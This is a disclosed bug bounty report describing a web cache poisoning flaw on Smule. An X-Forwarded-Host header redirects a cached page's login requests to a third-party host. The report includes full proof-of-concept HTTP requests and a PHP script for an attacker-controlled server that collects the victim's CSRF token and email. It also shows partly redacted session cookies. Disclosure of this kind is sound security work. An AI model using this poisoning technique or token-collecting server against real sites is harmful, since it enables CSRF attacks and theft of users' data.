Web cache poisoning leads to disclosure of CSRF token and sensitive information
Discovered by red_assassin on Smule

This issue took 14 Days and 18 hours to triage and 94 Days and 17 hours to resolve once triaged.



Summary:

The page https://www.smule.com/s/smule_groups/user_groups/user_name is vulnerable to web cache poisoning.

Description:

The page https://www.smule.com/s/smule_groups/user_groups/user_name is vulnerable to web cache poisoning, on adding X-Forwarded-Host header to the request multiple request links get change which leads a user to make requests to a third party website.

Steps To Reproduce:

GET /s/smule_groups/user_groups/fossnow27 HTTP/1.1
Host: www.smule.com
X-Forwarded-Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: smule_id_production=████%3D%3D--a559b392c9fc10711c799307af296a387ec77794; smule_cookie_banner_disabled=true; _ga=GA1.2.1744768224.1551586925; _gid=GA1.2.2071077738.1551586925; L=N; _smule_web_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiJTY4Nzc0ZDQxYjdiYmEyYTlmNmRkZTk3NjYwYmRlMDBkBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWhmSkdDZk9XcGhHajc5dXFHd1FYc1NhUnh0eGtjVHBocG1Sb3RubldlNDg9BjsARg%3D%3D--4ea860dfb2e3ad2a5a3d49c058f35485961ac5d3; cookies.js=1; smule_autoplay={%22enabled%22:true}; py={%22globalVolume%22:true%2C%22volume%22:0.5}; connection_info=eyJjb3VudHJ5IjoiSU4iLCJob21lUG9wIjoic2ciLCJjb250ZW50UHJveHkiOiJ0YyJ9--16206c9d48aa7c70227255756cc5a9e1e43d3cab
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"74107fb6dcc410390f339e5ddabc3022"
Cache-Control: max-age=0

In the above request I have added X-Forwarded-Host header.

  • The response returned is shown below, changing the action links as well as footer links of the page. {F434734}

  • Now open the response, and try to login, when you will login following request will be made > If you will refresh the page it will ask for resubmission as it is a type of revalidate type of caching.

POST /user/check_email HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.smule.com/s/smule_groups/user_groups/fossnow27
X-CSRF-Token: █████████=
Content-Type: application/x-www-form-urlencoded
X-Smulen: daf446d26def7faeef4f6527d7f20fae
Content-Length: 31
Origin: https://www.smule.com
Connection: close

email=foo%40bar.com 

to mimic the reponse of the actual server response I have written the following script

<?php
if($_SERVER['REQUEST_METHOD'] == "OPTIONS"){
    if($_SERVER['HTTP_ORIGIN'] == "https://www.smule.com"){
        header('Access-Control-Allow-Origin: *');
        header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
        header('Access-Control-Allow-Headers: x-csrf-token,x-smulen');
        header('Access-Control-Max-Age: 1728000');
        header("Content-Length: 0");
        header("Content-Type: text/plain");
        exit;
    }
    else{
        header("HTTP/1.1 403 Access Forbidden");
        header("Content-Type: text/plain");
        echo "You cannot repeat this request";
    }
}

else if($_SERVER["REQUEST_METHOD"] == "POST"){
    header("Content-type: application/json; charset=utf-8");
    header("Cache-Control: max-age=0, private, must-revalidate");
    header("Content-Security-Policy: default-src * data: blob:; frame-ancestors *.smule.com; script-src 'unsafe-inline' 'unsafe-eval' blob: https://boards.greenhouse.io/embed/job_board/js https://js.stripe.com/v2/ https://js.stripe.com/v3/ http://*.smule.com:* http://*.facebook.net http://*.google-analytics.com http://*.google.com http://*.googleapis.com http://*.gstatic.com https://*.smule.com:* https://*.facebook.net https://*.accountkit.com https://*.google-analytics.com https://*.google.com https://*.googleapis.com https://*.gstatic.com http://www.apple.com/library/quicktime/scripts/ac_quicktime.js https://www.apple.com/library/quicktime/scripts/ac_quicktime.js platform.twitter.com https://optimize.google.com; style-src 'unsafe-inline' data: http://*.smule.com:* https://*.smule.com:* yui.yahooapis.com https://optimize.google.com https://fonts.googleapis.com; report-uri /s/csp-log;");
    header("X-Frame-Options: SAMEORIGIN");
    header("Set-Cookie: smule_id_production=████%3D%3D--a559b392c9fc10711c799307af296a387ec77794;domain=.smule.com; path=/; expires=Fri, 01-Jan-2038 08:00:00 GMT");
    header("ETag: W/\"5be24db7cb9adabbe965c1850ce0de98\"");
    header("X-Request-Id: 9c67b0a57e77660dacbefea12085f82f");
    $res = array("email"=>true, "token" => $_SERVER["HTTP_X_CSRF_TOKEN"], "mail" => $_POST['email']);
    echo json_encode($res);
}
?>

The request/respone is shown below:

{F434739}

Impact:

  • CSRF attacks.
  • Sensitive Information leakage.

Supporting Material/References:

Impact

  • CSRF attacks
  • Information disclosure